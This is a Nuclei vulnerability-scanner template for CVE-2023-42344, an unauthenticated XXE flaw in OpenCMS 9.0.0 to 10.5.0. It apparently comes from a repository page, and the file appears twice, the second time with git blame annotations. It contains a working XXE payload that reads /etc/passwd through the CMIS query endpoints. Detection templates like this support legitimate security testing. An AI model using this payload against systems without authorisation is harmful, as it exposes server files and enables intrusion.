nuclei-templates/http/cves/2023/CVE-2023-42344.yaml

id: CVE-2023-42344

info:
  name: OpenCMS - XML external entity (XXE)
  author: 0xr2r
  severity: high
  description: |
    users can execute code without authentication.  An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
  remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
  reference:
    - https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
    - https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
  metadata:
    verified: true
    max-request: 2
    fofa-query: "OpenCms-9.5.3"
  tags: cve,cve2023,xxe,opencms

http:
  - method: POST
    path:
      - "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
      - "{{BaseURL}}/cmisatom/cmis-online/query"
    headers:
      Content-Type: "application/xml;charset=UTF-8"
      Referer: "{{RootURL}}"
    body: |
      <?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="<http://docs.oasis-open.org/ns/cmis/core/200908/>"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "invalidArgument"
        condition: and
# digest: 4b0a00483046022100f7dbfd49302b6ff73e5301cdb82e1fea60540cdbacb1e9a04069885d75bbc145022100c7ec2bc827d6116bdc018f12ea636664f6d8688600854967a7d4cc2734c100d4:922c64590222798bb761d5b6d8e72950
Create CVE-2023-42344 2024-02-20 12:30:27 +00:00			`id: CVE-2023-42344`
minor update 2024-02-22 07:08:41 +00:00
Create CVE-2023-42344 2024-02-20 12:30:27 +00:00			`info:`
Update CVE-2023-42344.yaml 2024-02-22 07:40:25 +00:00			`name: OpenCMS - XML external entity (XXE)`
Update CVE-2023-42344.yaml 2024-02-22 07:39:01 +00:00			`author: 0xr2r`
Create CVE-2023-42344 2024-02-20 12:30:27 +00:00			`severity: high`
			`description: \|`
			`users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability`
Create CVE-2023-42344 2024-02-20 12:30:27 +00:00			`reference:`
			`- https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344`
			`- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/`
			`metadata:`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`verified: true`
TemplateMan Update [Mon Mar 4 08:20:22 UTC 2024] :robot: 2024-03-04 08:20:22 +00:00			`max-request: 2`
Create CVE-2023-42344 2024-02-20 12:30:27 +00:00			`fofa-query: "OpenCms-9.5.3"`
minor update 2024-02-22 07:08:41 +00:00			`tags: cve,cve2023,xxe,opencms`
Create CVE-2023-42344 2024-02-20 12:30:27 +00:00
			`http:`
			`- method: POST`
			`path:`
			`- "{{BaseURL}}/opencms/cmisatom/cmis-online/query"`
			`- "{{BaseURL}}/cmisatom/cmis-online/query"`
			`headers:`
minor update 2024-02-22 07:08:41 +00:00			`Content-Type: "application/xml;charset=UTF-8"`
			`Referer: "{{RootURL}}"`
Create CVE-2023-42344 2024-02-20 12:30:27 +00:00			`body: \|`
			<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="<http://docs.oasis-open.org/ns/cmis/core/200908/>"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>

			`stop-at-first-match: true`
			`matchers-condition: and`
			`matchers:`
minor update 2024-02-22 07:08:41 +00:00			`- type: regex`
Create CVE-2023-42344 2024-02-20 12:30:27 +00:00			`part: body`
minor update 2024-02-22 07:08:41 +00:00			`regex:`
			`- "root:.*:0:0:"`
			`- "invalidArgument"`
Create CVE-2023-42344 2024-02-20 12:30:27 +00:00			`condition: and`
Auto Template Signing [Mon Mar 25 11:57:16 UTC 2024] :robot: 2024-03-25 11:57:16 +00:00			`# digest: 4b0a00483046022100f7dbfd49302b6ff73e5301cdb82e1fea60540cdbacb1e9a04069885d75bbc145022100c7ec2bc827d6116bdc018f12ea636664f6d8688600854967a7d4cc2734c100d4:922c64590222798bb761d5b6d8e72950`